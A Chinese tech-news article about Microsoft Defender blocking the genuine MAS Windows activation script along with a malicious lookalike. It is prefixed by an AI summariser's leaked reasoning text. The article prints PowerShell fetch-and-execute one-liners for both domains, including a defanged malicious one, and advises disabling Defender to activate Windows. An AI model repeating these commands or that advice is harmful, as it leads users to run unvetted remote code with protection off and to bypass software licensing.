微软封杀假MAS激活工具时不慎将真MAS也封杀 用户激活需要提前关闭安全防护
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读文章,理解其主要信息。 文章讲的是微软为了封杀假冒的MAS激活工具,结果误封了正版的MAS。用户现在执行激活命令时会被拦截,显示木马病毒FakeMas。微软的Microsoft Defender拦截了恶意软件,但同时也误拦了正版工具。用户需要禁用安全防护才能激活,但要注意域名正确,防止恶意软件入侵。 接下来,我要提取关键点:微软封杀假MAS导致真被拦截、用户需禁用安全功能、注意域名以防恶意软件。 然后,我需要用简洁的语言把这些点整合起来,确保在100字以内。可能的结构是先说明问题,再讲解决方法和注意事项。 最后检查字数是否符合要求,并确保信息准确无误。 </think> 微软在封杀假冒MAS激活工具时误将正版MAS拦截,用户需禁用Windows安全防护功能才能执行激活命令。 2026-1-9 02:25:36 Author: www.landiannews.com(查看原文) 阅读量:6 收藏

推广

推广

#安全资讯 微软封杀假 MAS 激活工具时不慎将真 MAS 也封杀,现在用户若要执行命令激活需要先禁用 Windows 10/11 安全防护功能。有网友发布的截图显示,在执行激活命令时被微软拦截,显示木马病毒 FakeMas,这应该是最近有人注册类似域名投毒引起微软关注后添加的拦截规则,但问题是真 MAS 也被拦截。查看全文:https://ourl.co/111545

微软显然也知道 MAS 在线激活工具,看起来微软也同样知道有黑客注册类似域名发布虚假的 MAS 激活工具来传播恶意软件,所以微软通过 Microsoft Defender 自动拦截虚假的 MAS 激活工具。

然而不幸的是微软在处理规则时似乎出现意外,因为真正的 MAS 激活工具现在同样被拦截,这导致用户在 PowerShell 中执行激活命令时将会因为被拦截而直接报错。

微软封杀假MAS激活工具时不慎将真MAS也封杀 用户激活需要提前关闭安全防护

图片来源:@Massgrave

那怎么知道微软不是有意要封杀真的 MAS 激活工具呢?在 Microsoft Defender 拦截记录里,微软提到的名称是 Trojan:PowerShell/FakeMas.DA!MTB

考虑到关于虚假 MAS 激活工具是最近才出现的并且 MAS 开发团队也在 X/Twitter 上公布了这件事,再加上微软的拦截动作也是近期开始的,这基本可以判断微软压根没想着拦截真正的 MAS 激活工具。

只是正版和恶意软件版仅在域名商有个字母的差异:

# 真正的 MAS 激活工具命令如下
irm https://get.activated.win | iex
# 携带病毒的假冒版本域名后少了个 d
irm hxxps://get.activate.win | iex

微软在处理拦截规则时应该是不慎将真正的 MAS 激活工具域名给拦截了,手头暂时没有虚拟机没法测试,不然蓝点网高低得试试钓鱼版是否被成功拦截,千万别是微软拦截错了放行钓鱼版把真正的 MAS 激活工具给拦截了。

现在摆在用户面前的问题是,Microsoft Defender 默认情况是开启的,因此用户在执行激活命令前必须先进入安全中心禁用这种安全防护,待成功激活后再开启各种安全防护即可。

这里还需要再次强调请执行激活命令时一定要认准域名,不然关闭防护的同时还执行钓鱼版激活命令那系统可能就会被安装恶意软件,后续可能会造成数据泄露等安全问题。


文章来源: https://www.landiannews.com/archives/111545.html
如有侵权请联系:admin#unsafe.sh